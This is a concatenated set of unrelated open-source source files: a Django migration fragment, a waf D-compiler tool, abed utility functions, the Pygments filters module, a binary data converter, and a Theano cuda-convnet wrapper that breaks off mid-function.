'systemverilog'), ('tads3', 'TADS 3'), ('tap', 'TAP'), ('tcl', 'Tcl'), ('tcsh', 'Tcsh'), ('tcshcon', 'Tcsh Session'), ('tea', 'Tea'), ('termcap', 'Termcap'), ('terminfo', 'Terminfo'), ('terraform', 'Terraform'), ('tex', 'TeX'), ('text', 'Text only'), ('thrift', 'Thrift'), ('todotxt', 'Todotxt'), ('trac-wiki', 'MoinMoin/Trac Wiki markup'), ('treetop', 'Treetop'), ('ts', 'TypeScript'), ('turtle', 'Turtle'), ('twig', 'Twig'), ('urbiscript', 'UrbiScript'), ('vala', 'Vala'), ('vb.net', 'VB.net'), ('vctreestatus', 'VCTreeStatus'), ('velocity', 'Velocity'), ('verilog', 'verilog'), ('vgl', 'VGL'), ('vhdl', 'vhdl'), ('vim', 'VimL'), ('x10', 'X10'), ('xml', 'XML'), ('xml+cheetah', 'XML+Cheetah'), ('xml+django', 'XML+Django/Jinja'), ('xml+erb', 'XML+Ruby'), ('xml+evoque', 'XML+Evoque'), ('xml+lasso', 'XML+Lasso'), ('xml+mako', 'XML+Mako'), ('xml+myghty', 'XML+Myghty'), ('xml+php', 'XML+PHP'), ('xml+smarty', 'XML+Smarty'), ('xml+velocity', 'XML+Velocity'), ('xquery', 'XQuery'), ('xslt', 'XSLT'), ('xtend', 'Xtend'), ('xul+mozpreproc', 'XUL+mozpreproc'), ('yaml', 'YAML'), ('yaml+jinja', 'YAML+Jinja'), ('zephir', 'Zephir')], default='python', max_length=100)),
                ('style', models.CharField(choices=[('algol', 'algol'), ('algol_nu', 'algol_nu'), ('autumn', 'autumn'), ('borland', 'borland'), ('bw', 'bw'), ('colorful', 'colorful'), ('default', 'default'), ('emacs', 'emacs'), ('friendly', 'friendly'), ('fruity', 'fruity'), ('igor', 'igor'), ('lovelace', 'lovelace'), ('manni', 'manni'), ('monokai', 'monokai'), ('murphy', 'murphy'), ('native', 'native'), ('paraiso-dark', 'paraiso-dark'), ('paraiso-light', 'paraiso-light'), ('pastie', 'pastie'), ('perldoc', 'perldoc'), ('rrt', 'rrt'), ('tango', 'tango'), ('trac', 'trac'), ('vim', 'vim'), ('vs', 'vs'), ('xcode', 'xcode')], default='friendly', max_length=100)),
                ('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='snippets', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ('created',),
            },
        ),
    ]
| bsd-2-clause |
NDNUtils/NDNSIM | .waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Tools/dmd.py | 21 | 1487 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
	# Locate a D compiler binary and store it in conf.env.D.
	conf.find_program(['dmd','dmd2','ldc'],var='D')
	# dmd/dmd2 report "D Compiler vX" in --help output; DMD1-based ldc
	# reports "based on DMD v1." via -version.  Anything else is rejected.
	out=conf.cmd_and_log(conf.env.D+['--help'])
	if out.find("D Compiler v")==-1:
		out=conf.cmd_and_log(conf.env.D+['-version'])
		if out.find("based on DMD v1.")==-1:
			conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
	# ldc-specific overrides, applied after common_flags_dmd by configure().
	v=conf.env
	v['DFLAGS']=['-d-version=Posix']
	v['LINKFLAGS']=[]
	# ldc needs PIC explicitly for shared libraries.
	v['DFLAGS_dshlib']=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
	# Baseline dmd command-line conventions (compile/link flag templates
	# consumed by waf's generic D support in Tools/d.py).
	v=conf.env
	v['D_SRC_F']=['-c']
	v['D_TGT_F']='-of%s'
	# dmd acts as its own linker driver; -L passes options through to ld.
	v['D_LINKER']=v['D']
	v['DLNK_SRC_F']=''
	v['DLNK_TGT_F']='-of%s'
	v['DINC_ST']='-I%s'
	v['DSHLIB_MARKER']=v['DSTLIB_MARKER']=''
	v['DSTLIB_ST']=v['DSHLIB_ST']='-L-l%s'
	v['DSTLIBPATH_ST']=v['DLIBPATH_ST']='-L-L%s'
	v['LINKFLAGS_dprogram']=['-quiet']
	v['DFLAGS_dshlib']=['-fPIC']
	v['LINKFLAGS_dshlib']=['-L-shared']
	# D interface-header generation (.di files).
	v['DHEADER_ext']='.di'
	v.DFLAGS_d_with_header=['-H','-Hf']
	v['D_HDR_F']='%s'
def configure(conf):
	# Tool entry point invoked by waf's configure stage.
	conf.find_dmd()
	# dmd2 is known-broken under this tool on Windows; bail out early.
	if sys.platform=='win32':
		out=conf.cmd_and_log(conf.env.D+['--help'])
		if out.find("D Compiler v2.")>-1:
			conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
	conf.load('ar')
	conf.load('d')
	conf.common_flags_dmd()
	conf.d_platform_flags()
	# ldc shares most dmd flags; apply its overrides last.
	if str(conf.env.D).find('ldc')>-1:
		conf.common_flags_ldc()
| gpl-2.0 |
GjjvdBurg/ABED | abed/utils.py | 1 | 1481 | # -*- coding: utf-8 -*-
"""
Various utility functions used throughout abed
"""
from __future__ import print_function
import errno
import os
from .conf import settings
basename = os.path.basename
splitext = os.path.splitext
def wrap_text(text, max_length=120):
    """Greedily wrap the words of *text* into lines of at most *max_length*
    characters (counting the trailing space added after each word), keeping
    the original newlines as hard breaks.
    """
    wrapped = []
    for part in text.split("\n"):
        line = ""
        used = 0
        for word in part.split(" "):
            needed = len(word) + 1
            if used + needed <= max_length:
                line += word + " "
                used += needed
            else:
                # Word does not fit: flush the current line, start a new one.
                wrapped.append(line)
                line = word + " "
                used = needed
        wrapped.append(line)
    return "\n".join(wrapped)
def mkdir(path):
    """Create *path* (including intermediate directories).

    An already-existing directory is not an error; every other OSError
    (including *path* existing as a regular file) is re-raised.
    """
    try:
        os.makedirs(path)
    except OSError as exc:
        # Benign repeat call / race: the directory is already there.
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
def hash_from_filename(filename):
    """Recover the task hash from a result file path by stripping the
    configured result extension off its basename."""
    return basename(filename)[: -len(settings.RESULT_EXTENSION)]
def clean_str(string):
    """Lower-case *string* and turn every space into an underscore."""
    return string.replace(" ", "_").lower()
def touch(fname, times=None):
    """Unix-style touch: create *fname* if missing and set its access and
    modification times (*times* is an (atime, mtime) pair, or None for now).
    """
    handle = open(fname, "a")
    try:
        os.utime(fname, times)
    finally:
        handle.close()
| gpl-2.0 |
lvduit/islab-portfolio-by-ghost | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/filters/__init__.py | 93 | 11491 | # -*- coding: utf-8 -*-
"""
pygments.filters
~~~~~~~~~~~~~~~~
Module containing filter lookup functions and default
filters.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.token import String, Comment, Keyword, Name, Error, Whitespace, \
string_to_tokentype
from pygments.filter import Filter
from pygments.util import get_list_opt, get_int_opt, get_bool_opt, \
get_choice_opt, ClassNotFound, OptionError
from pygments.plugin import find_plugin_filters
def find_filter_class(filtername):
    """
    Lookup a filter by name.  Return None if not found.
    """
    builtin = FILTERS.get(filtername)
    if builtin is not None:
        return builtin
    # Fall back to filters registered through setuptools entry points.
    for name, cls in find_plugin_filters():
        if name == filtername:
            return cls
    return None
def get_filter_by_name(filtername, **options):
    """
    Return an instantiated filter.  Options are passed to the filter
    initializer if wanted.  Raise a ClassNotFound if not found.
    """
    cls = find_filter_class(filtername)
    if cls is None:
        raise ClassNotFound('filter %r not found' % filtername)
    return cls(**options)
def get_all_filters():
    """
    Return a generator of all filter names, built-in filters first and
    plugin-provided filters after them.
    """
    for builtin_name in FILTERS:
        yield builtin_name
    for plugin_name, _cls in find_plugin_filters():
        yield plugin_name
def _replace_special(ttype, value, regex, specialttype,
replacefunc=lambda x: x):
last = 0
for match in regex.finditer(value):
start, end = match.start(), match.end()
if start != last:
yield ttype, value[last:start]
yield specialttype, replacefunc(value[start:end])
last = end
if last != len(value):
yield ttype, value[last:]
class CodeTagFilter(Filter):
    """
    Highlight special code tags in comments and docstrings.

    Options accepted:

    `codetags` : list of strings
        The strings to flag as code tags.  Defaults to ``XXX``, ``TODO``,
        ``BUG`` and ``NOTE``.
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        tags = get_list_opt(options, 'codetags',
                            ['XXX', 'TODO', 'BUG', 'NOTE'])
        alternatives = '|'.join(re.escape(tag) for tag in tags if tag)
        self.tag_re = re.compile(r'\b(%s)\b' % alternatives)

    def filter(self, lexer, stream):
        regex = self.tag_re
        for ttype, value in stream:
            in_docstring = ttype in String.Doc
            in_plain_comment = (ttype in Comment and
                                ttype not in Comment.Preproc)
            if in_docstring or in_plain_comment:
                for token in _replace_special(ttype, value, regex,
                                              Comment.Special):
                    yield token
            else:
                yield ttype, value
class KeywordCaseFilter(Filter):
    """
    Rewrite keyword tokens to lowercase, uppercase or capitalized form
    (first letter uppercase, rest lowercase) — handy for e.g. adapting
    Pascal code to a styleguide.

    Options accepted:

    `case` : string
        One of ``'lower'``, ``'upper'`` or ``'capitalize'``.
        The default is ``'lower'``.
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        case = get_choice_opt(options, 'case',
                              ['lower', 'upper', 'capitalize'], 'lower')
        # Bind the matching str method (str.lower / str.upper / str.capitalize).
        self.convert = getattr(str, case)

    def filter(self, lexer, stream):
        for ttype, value in stream:
            if ttype not in Keyword:
                yield ttype, value
            else:
                yield ttype, self.convert(value)
class NameHighlightFilter(Filter):
    """
    Re-type selected Name (and Name.*) tokens with a different token type.

    Example::

        filter = NameHighlightFilter(
            names=['foo', 'bar', 'baz'],
            tokentype=Name.Function,
        )

    highlights "foo", "bar" and "baz" as functions.

    Options accepted:

    `names` : list of strings
        The identifiers to re-type.  No default.
    `tokentype` : TokenType or string
        The token type (or its string name) used for the listed identifiers.
        Defaults to `Name.Function`.
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        names = get_list_opt(options, 'names', [])
        self.names = set(names)
        requested = options.get('tokentype')
        self.tokentype = (string_to_tokentype(requested)
                          if requested else Name.Function)

    def filter(self, lexer, stream):
        for ttype, value in stream:
            matched = ttype in Name and value in self.names
            yield (self.tokentype if matched else ttype), value
class ErrorToken(Exception):
    """Default exception raised by :class:`RaiseOnErrorTokenFilter`."""
    pass
class RaiseOnErrorTokenFilter(Filter):
    """
    Raise an exception as soon as the lexer generates an error token.

    Options accepted:

    `excclass` : Exception class
        The exception class to raise.
        The default is `pygments.filters.ErrorToken`.

    *New in Pygments 0.8.*
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        self.exception = options.get('excclass', ErrorToken)
        # issubclass() raises TypeError when handed a non-class; treat that
        # the same as a class that is not an Exception subclass.
        try:
            valid = issubclass(self.exception, Exception)
        except TypeError:
            valid = False
        if not valid:
            raise OptionError('excclass option is not an exception class')

    def filter(self, lexer, stream):
        for ttype, value in stream:
            if ttype is not Error:
                yield ttype, value
            else:
                raise self.exception(value)
class VisibleWhitespaceFilter(Filter):
    """
    Convert tabs, newlines and/or spaces to visible characters.

    Options accepted:

    `spaces` : string or bool
        If this is a one-character string, spaces will be replaced by this
        string.  If it is another true value, spaces will be replaced by
        ``·`` (unicode MIDDLE DOT).  If it is a false value, spaces will not
        be replaced.  The default is ``False``.
    `tabs` : string or bool
        The same as for `spaces`, but the default replacement character is
        ``»`` (unicode RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK).  The
        default value is ``False``.  Note: this will not work if the
        `tabsize` option for the lexer is nonzero, as tabs will already have
        been expanded then.
    `tabsize` : int
        If tabs are to be replaced by this filter (see the `tabs` option),
        this is the total number of characters that a tab should be expanded
        to.  The default is ``8``.
    `newlines` : string or bool
        The same as for `spaces`, but the default replacement character is
        ``¶`` (unicode PILCROW SIGN).  The default value is ``False``.
    `wstokentype` : bool
        If true, give whitespace the special `Whitespace` token type.  This
        allows styling the visible whitespace differently (e.g. greyed out),
        but it can disrupt background colors.  The default is ``True``.

    *New in Pygments 0.8.*
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        # For each option: a 1-char string is used verbatim, any other true
        # value selects the unicode default, false disables the replacement.
        for name, default in list({'spaces': '·', 'tabs': '»', 'newlines': '¶'}.items()):
            opt = options.get(name, False)
            if isinstance(opt, str) and len(opt) == 1:
                setattr(self, name, opt)
            else:
                setattr(self, name, (opt and default or ''))
        tabsize = get_int_opt(options, 'tabsize', 8)
        # Pad the tab marker so a tab still occupies `tabsize` columns.
        if self.tabs:
            self.tabs += ' '*(tabsize-1)
        # Keep the real newline so lines still break after the pilcrow.
        if self.newlines:
            self.newlines += '\n'
        self.wstt = get_bool_opt(options, 'wstokentype', True)

    def filter(self, lexer, stream):
        if self.wstt:
            # Re-type replaced whitespace as Whitespace tokens.
            spaces = self.spaces or ' '
            tabs = self.tabs or '\t'
            newlines = self.newlines or '\n'
            regex = re.compile(r'\s')
            def replacefunc(wschar):
                if wschar == ' ':
                    return spaces
                elif wschar == '\t':
                    return tabs
                elif wschar == '\n':
                    return newlines
                return wschar

            for ttype, value in stream:
                for sttype, svalue in _replace_special(ttype, value, regex,
                                                       Whitespace, replacefunc):
                    yield sttype, svalue
        else:
            spaces, tabs, newlines = self.spaces, self.tabs, self.newlines
            # simpler processing
            for ttype, value in stream:
                if spaces:
                    value = value.replace(' ', spaces)
                if tabs:
                    value = value.replace('\t', tabs)
                if newlines:
                    value = value.replace('\n', newlines)
                yield ttype, value
class GobbleFilter(Filter):
    """
    Gobbles source code lines (eats initial characters).

    Drops the first ``n`` characters off every line of code — useful when
    the source fed to the lexer is indented by a fixed amount of space that
    is not wanted in the output.

    Options accepted:

    `n` : int
        The number of characters to gobble.

    *New in Pygments 1.2.*
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)
        self.n = get_int_opt(options, 'n', 0)

    def gobble(self, value, left):
        # Eat up to `left` characters from `value`; return the remainder and
        # how many characters are still owed on this line.
        if left < len(value):
            return value[left:], 0
        return '', left - len(value)

    def filter(self, lexer, stream):
        n = self.n
        left = n  # characters still to eat on the current line
        for ttype, value in stream:
            lines = value.split('\n')
            chunks = []
            for index, line in enumerate(lines):
                if index:
                    # A newline inside the token starts a fresh line.
                    left = n
                chunk, left = self.gobble(line, left)
                chunks.append(chunk)
            value = '\n'.join(chunks)
            if value:
                yield ttype, value
class TokenMergeFilter(Filter):
    """
    Merge consecutive tokens that share the same token type in the output
    stream of a lexer.

    *New in Pygments 1.2.*
    """

    def __init__(self, **options):
        Filter.__init__(self, **options)

    def filter(self, lexer, stream):
        pending_type = None
        pending_value = None
        for ttype, value in stream:
            if ttype is not pending_type:
                # Flush the previous run before starting a new one.
                if pending_type is not None:
                    yield pending_type, pending_value
                pending_type, pending_value = ttype, value
            else:
                pending_value += value
        if pending_type is not None:
            yield pending_type, pending_value
# Registry of built-in filters, keyed by the public name accepted by
# get_filter_by_name() / find_filter_class().
FILTERS = {
    'codetagify':     CodeTagFilter,
    'keywordcase':    KeywordCaseFilter,
    'highlight':      NameHighlightFilter,
    'raiseonerror':   RaiseOnErrorTokenFilter,
    'whitespace':     VisibleWhitespaceFilter,
    'gobble':         GobbleFilter,
    'tokenmerge':     TokenMergeFilter,
}
| mit |
ucsb-ilabs/shapematching | src/main/python/edu/ucsb/ilab/shapematching/readDat.py | 1 | 1489 | #!/usr/bin/env python
import sys, math, string, optparse, fileinput, struct, array
def main():
    """Convert a binary .dat matrix file into a tab-separated text file,
    optionally prefixing each row with the first four tab-separated fields
    of a template file.

    NOTE: this is Python 2 code (print statements, old-style optparse use).
    """
    usage = "%prog [options] <datafile> <mssfile>"
    version = "%prog 0.2\n Longbin Chen, longbinc@yahoo.com"
    oparser = optparse.OptionParser(usage=usage, version=version)
    oparser.add_option('-t', '--template', dest = 'template', default = None, help = 'template file ')
    # sys.argv is passed whole, so args[0] is the program name and the two
    # real arguments live in args[1] and args[2] — hence the != 3 check.
    (options, args) = oparser.parse_args(sys.argv)
    if len(args) != 3:
        oparser.parse_args([sys.argv[0], "--help"])
        sys.exit(1)
    fileobj = open(args[1], 'rb')  # binary input matrix
    fout = open(args[2], "w")      # tab-separated text output
    # Header layout: a magic line, then "N dim", then "min max".
    magicnum = fileobj.readline()
    line2 = fileobj.readline()
    N, dim = [int(x) for x in line2.strip(" ").split()]
    line3 = fileobj.readline()
    # NOTE(review): these names shadow the builtins min/max inside main().
    min, max= [float(x) for x in line3.strip(" ").split()]
    if (options.template):
        # Copy the template's header line straight through to the output.
        ftempl = open(options.template, "r")
        header = ftempl.readline()
        fout.write(header)
    print magicnum,
    print "%d lines, each line %d dim "% (N, dim)
    print "%f min, %f max "% (min, max)
    for i in range(N):
        if (options.template):
            # Prefix the row with the first four fields of the template row.
            dr = ftempl.readline().strip("\n\t").split("\t")
            fout.write("\t".join(dr[0:4]))
        for j in range(dim):
            # '>f' = big-endian 32-bit float, 4 bytes per value.
            t = struct.unpack('>f', fileobj.read(4))
            fout.write("\t%3.5f" % t[0])
        fout.write("\n")
    if (options.template):
        ftempl.close()
    fileobj.close()
    fout.close()

if __name__ == '__main__':
    main()
| gpl-2.0 |
JesseLivezey/pylearn2 | pylearn2/sandbox/cuda_convnet/img_acts.py | 49 | 14809 | """
A theano / pylearn2 wrapper for cuda-convnet's convFilterActs function.
"""
__authors__ = "David Warde-Farley and Ian Goodfellow"
__copyright__ = "Copyright 2010-2013, Universite de Montreal"
__credits__ = ["David Warde-Farley and Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
"""
This module may contain code copied directly or modified from cuda-convnet.
The copyright and licensing notice for this code is reproduced below:
/*
* Copyright (c) 2011, Alex Krizhevsky (akrizhevsky@gmail.com)
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
"""
from theano.gradient import DisconnectedType
from theano.gof import Apply
from theano.sandbox.cuda import CudaNdarrayType
from theano.sandbox.cuda.basic_ops import as_cuda_ndarray_variable
from pylearn2.sandbox.cuda_convnet.base_acts import BaseActs
from pylearn2.sandbox.cuda_convnet.base_acts import UnimplementedError
# Must delay import to avoid circular import problem
FilterActs = None
WeightActs = None
class ImageActs(BaseActs):
    """
    Transpose of FilterActs.

    This is intended to be a very low-level, performance-oriented op.

    It will not try to fix the input for you. That would slow it down.
    The input must be in the right format. If not, it raises an exception.

    Currently, this op must be inserted manually, not by optimizations.

    Note that below the term "input" refers to the input to FilterActs.
    This op does the tranpose of that, so its output is sized like
    FilterActs' input.

    * hid_acts: (output channels, rows, cols, batch_size)
    * filters: (input channels, filter rows, filter cols, output channels).
      Rows must be the same as cols. Output channels must be a multiple
      of 16.
    * output: (input channels, input rows, input cols, batch size)

    Notes
    -----
    All of these convolution routines are optimized for the case when
    the number of images (i.e. the minibatch size) is a multiple of 128.
    Other batch sizes will work, but Alex "made no attempt whatsoever
    to make them work fast."
    """
    # __eq__ and __hash__ are defined in BaseActs.
    # If you add an __init__ method that adds new members to ImageActs,
    # you may need to implement a new version of __eq__ and __hash__
    # in ImageActs, that considers these parameters.

    def make_node(self, hid_acts, filters, output_shape=None):
        """
        Build the Apply node applying this op to the given inputs.

        Parameters
        ----------
        hid_acts : CudaNdarray variable
            Hidden activations, laid out as
            (output channels, rows, cols, batch size); must be 4D.
        filters : CudaNdarray variable
            Filters, laid out as
            (input channels, filter rows, filter cols, output channels);
            must be 4D.
        output_shape : 2-element TensorVariable, optional
            The spatial (rows, cols) shape of the reconstructed image.
            Required when ``self.stride != 1``; for stride 1 it is inferred
            symbolically from the hid_acts and filter shapes.
        """
        if not isinstance(hid_acts.type, CudaNdarrayType):
            raise TypeError("ImageActs: expected hid_acts.type to be CudaNdarrayType, "
                    "got " + str(hid_acts.type))

        if not isinstance(filters.type, CudaNdarrayType):
            raise TypeError("ImageActs: expected filters.type to be CudaNdarrayType, "
                    "got " + str(filters.type))

        if output_shape is None:
            if self.stride != 1:
                # With stride > 1 the image size is ambiguous (several image
                # sizes map to the same hid_acts size), so it must be given.
                raise ValueError("You must specify an output_shape for ImageActs if the stride is not 1.")
            hid_shape = hid_acts.shape[1:3]
            kernel_shape = filters.shape[1:3]
            output_shape = hid_shape + kernel_shape - 2 * self.pad - 1

        assert hid_acts.ndim == 4
        assert filters.ndim == 4

        channels_broadcastable = filters.type.broadcastable[3]
        batch_broadcastable = hid_acts.type.broadcastable[3]
        # Computing whether the rows and columns are broadcastable requires doing
        # arithmetic on quantities that are known only at runtime, like the specific
        # shape of the image and kernel
        rows_broadcastable = False
        cols_broadcastable = False
        targets_broadcastable = (channels_broadcastable, rows_broadcastable,
                cols_broadcastable, batch_broadcastable)
        targets_type = CudaNdarrayType(broadcastable=targets_broadcastable)
        targets = targets_type()

        return Apply(self, [hid_acts, filters, output_shape], [targets])

    def flops(self, inputs, outputs):
        """ Useful with the hack in profilemode to print the MFlops"""
        hid_acts, filters, output_shape = inputs
        out, = outputs
        # Channel counts of hid_acts and filters must agree.
        assert hid_acts[0] == filters[3]
        # 2 flops (multiply + add) per filter tap, per hid_acts position,
        # per batch element.
        flops = (hid_acts[3] * filters[0] * hid_acts[0] *
                 filters[1] * filters[2] *
                 hid_acts[1] * hid_acts[2] * 2)
        return flops

    def connection_pattern(self, node):
        """
        The output is connected to hid_acts and filters, but not to
        output_shape (which carries only integer shape information).
        """
        return [[1], [1], [0]]

    def grad(self, inputs, g_outputs):
        """
        Gradients w.r.t. hid_acts (via FilterActs) and filters (via
        WeightActs); output_shape gets a DisconnectedType gradient.
        """
        hid_acts, filters, output_shape = inputs
        g_images, = g_outputs
        g_images = as_cuda_ndarray_variable(g_images)
        assert not isinstance(g_images, list)

        global FilterActs
        global WeightActs
        if FilterActs is None:
            # Delayed import to avoid a circular import problem.
            from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
            from pylearn2.sandbox.cuda_convnet.weight_acts import WeightActs

        g_filters = WeightActs(stride=self.stride,
                partial_sum=self.partial_sum, pad=self.pad)(
                        g_images, hid_acts, filters.shape[1:3])[0]
        assert not isinstance(g_filters, list)
        g_hid_acts = FilterActs(stride=self.stride, pad=self.pad,
                partial_sum=self.partial_sum)(g_images, filters)

        return [g_hid_acts, g_filters, DisconnectedType()()]

    def c_code(self, node, name, inputs, outputs, sub):
        """
        Emit the CUDA C implementation: validate the 4D inputs, allocate
        the target CudaNdarray from output_shape, and call cuda-convnet's
        ``convImgActs``. The code is assembled from string templates and
        finally interpolated with ``locals()``.
        """
        hid_acts, filters, output_shape = inputs
        targets, = outputs
        fail = sub['fail']

        # convFilterActs will multiply targets by scaleTargets
        # then add scaleOutput * (the convolution value)
        # We could make use of this to implement an inplace
        # addconv op but for this op we just want to compute
        # the convolution so we set them to 0 and 1 respectively
        # Note: there is another version of convFilterActs that
        # does not take these arguments, but it is just a wrapper
        # around the version that does take them, so we save
        # a function call by using the version that we use.
        basic_setup = """
        #define scaleTargets 0
        #define scaleOutput 1
        """

        if self.dense_connectivity:
            basic_setup += """
            #define numGroups 1
            """

        basic_setup += """
        #define paddingStart (-%d)
        """ % self.pad

        basic_setup += """
        #define moduleStride %d
        """ % self.stride

        if self.copy_non_contiguous:
            raise UnimplementedError()
        else:
            basic_setup += "#define IMAGEACTS_COPY_NON_CONTIGUOUS 0\n"

        # The amount of braces that must be closed at the end
        num_braces = 0

        # Convert images int nv_hid_acts, an NVMatrix, for compatibility
        # with the cuda-convnet functions
        setup_nv_hid_acts = self._argument_contiguity_check("hid_acts") + """
        if (%(hid_acts)s->nd != 4)
        {
            PyErr_Format(PyExc_ValueError,
                "hid_acts must have nd=4, got nd=%%i", %(hid_acts)s->nd);
            %(fail)s;
        }

        { //setup_nv_hid_acts brace 1
        const int *hid_act_dims = CudaNdarray_HOST_DIMS(%(hid_acts)s);
        const int numFilters = hid_act_dims[0];
        const int hidActsSizeY = hid_act_dims[1];
        const int hidActsSizeX = hid_act_dims[2];
        //printf("hidActs shape: %%d %%d\\n", hidActsSizeY, hidActsSizeX);
        const int batch_size = hid_act_dims[3];
        NVMatrix nv_hid_acts(%(hid_acts)s, numFilters * hidActsSizeY *
                hidActsSizeX, batch_size, "image_acts:nv_hid_acts");
        int img_channels = -1;
        """
        num_braces += 1

        # Convert filters into nv_filters, an NVMatrix, for compatibility
        # with the cuda-convnet functions
        setup_nv_filters = self._argument_contiguity_check("filters") + """
        if (%(filters)s->nd != 4)
        {
            PyErr_Format(PyExc_ValueError,
                "filters must have nd=4, got nd=%%i", %(filters)s->nd);
            %(fail)s;
        }

        { // setup_nv_filters brace 1
        const int * filters_dims = CudaNdarray_HOST_DIMS(%(filters)s);
        const int filter_channels = filters_dims[0];
        const int filter_rows = filters_dims[1];
        const int filter_cols = filters_dims[2];
        const int num_filters = filters_dims[3];

        if ((num_filters %% (numGroups * 16)) != 0)
        {
            PyErr_Format(PyExc_ValueError,
                "Each group must have a multiple of 16 channels, but num_filters %%%% (numGroups * 16) = %%d %%%% ( %%d * 16) = %%d.",
                num_filters, numGroups, num_filters %% (numGroups * 16));
            %(fail)s;
        }

        if (filter_rows != filter_cols)
        {
            PyErr_Format(PyExc_ValueError,
                "filter must be square, but have shape (%%d, %%d).",
                filter_rows, filter_cols);
            %(fail)s;
        }
        else if (moduleStride > filter_rows) {
            PyErr_Format(PyExc_ValueError,
                "stride %%d greater than filter size (%%d, %%d)",
                moduleStride, filter_rows, filter_cols);
            %(fail)s;
        }

        { // setup_nv_filters brace 2
        NVMatrix nv_filters(%(filters)s, filter_channels * filter_rows *
            filter_cols, num_filters, "img_acts:nv_filters");
        """
        num_braces += 2

        #target_rows = "(hidActsSizeY + filter_rows + 2 * paddingStart) * moduleStride - 1"
        #target_cols = "(hidActsSizeX + filter_cols + 2 * paddingStart) * moduleStride - 1"

        # Validate the runtime output_shape vector (1-D, length 2, integer
        # dtype), cast it to npy_intp, and allocate the 4-D target array.
        setup_nv_targets = """
        #define numModulesY hid_act_dims[1]
        #define numModulesX hid_act_dims[2]

        npy_intp *shape_dims = PyArray_DIMS(%(output_shape)s);
        npy_intp target_rows, target_cols;
        PyArrayObject *casted_shape;
        PyArray_Descr *intp_dtype;
        if (PyArray_NDIM(%(output_shape)s) != 1) {
            PyErr_Format(PyExc_ValueError,
                "output shape must be a vector, got %%d-tensor",
                PyArray_NDIM(%(output_shape)s));
            %(fail)s;
        }
        else if (shape_dims[0] != 2)
        {
            PyErr_Format(PyExc_ValueError,
                "output shape must be length 2, got %%d",
                (int)shape_dims[0]);
            %(fail)s;
        }
        else if ((PyArray_DESCR(%(output_shape)s))->kind != 'i' &&
                 (PyArray_DESCR(%(output_shape)s))->kind != 'u')
        {
            PyErr_SetString(PyExc_TypeError,
                "output shape must have integer or uint dtype");
            %(fail)s;
        }
        intp_dtype = PyArray_DescrFromType(NPY_INTP);
        casted_shape = (PyArrayObject *)PyArray_CastToType(%(output_shape)s,
                                                           intp_dtype, 0);
        target_rows = *((npy_intp *)PyArray_GETPTR1(casted_shape, 0));
        target_cols = *((npy_intp *)PyArray_GETPTR1(casted_shape, 1));
        {
        int target_dims [] = {
            filter_channels,
            target_rows,
            target_cols,
            batch_size };

        #define filterSize filter_rows
        #define MAX_ROWS (paddingStart + (numModulesY-1) * moduleStride + filterSize)
        if ((target_rows > MAX_ROWS)
            || (paddingStart + (numModulesX-1) * moduleStride + filterSize < target_cols))
        {
            PyErr_Format(PyExc_ValueError, "pylearn2.sandbox.cuda_convnet.image_acts.ImageActs: incompatible target image size (%%d, %%d), maximum (%%d, %%d)",
                (int)target_rows, (int)target_cols,
                (int)MAX_ROWS,
                (int)(paddingStart + (numModulesX-1) * moduleStride + filterSize));
            %(fail)s;
        }
        if (CudaNdarray_prep_output(& %(targets)s, 4, target_dims))
        {
            %(fail)s;
        }

        { // setup_nv_filters brace # 1
        const int imgSizeY = (int)target_rows;
        const int imgSizeX = (int)target_cols;

        NVMatrix nv_targets(%(targets)s, target_dims[0] * target_dims[1]
            * target_dims[2], target_dims[3], "image_acts: nv_targets");

        """
        num_braces += 2

        # note: numFilters is not specified here. it is determined by
        # nv_filters.getNumCols()
        #
        # note: the size of the filters is determined by dividing
        # nv_filters.getNumRows() by numFilterColors
        #
        do_convolution = """
        convImgActs(nv_hid_acts, nv_filters, nv_targets,
                    imgSizeY, imgSizeX, numModulesY,
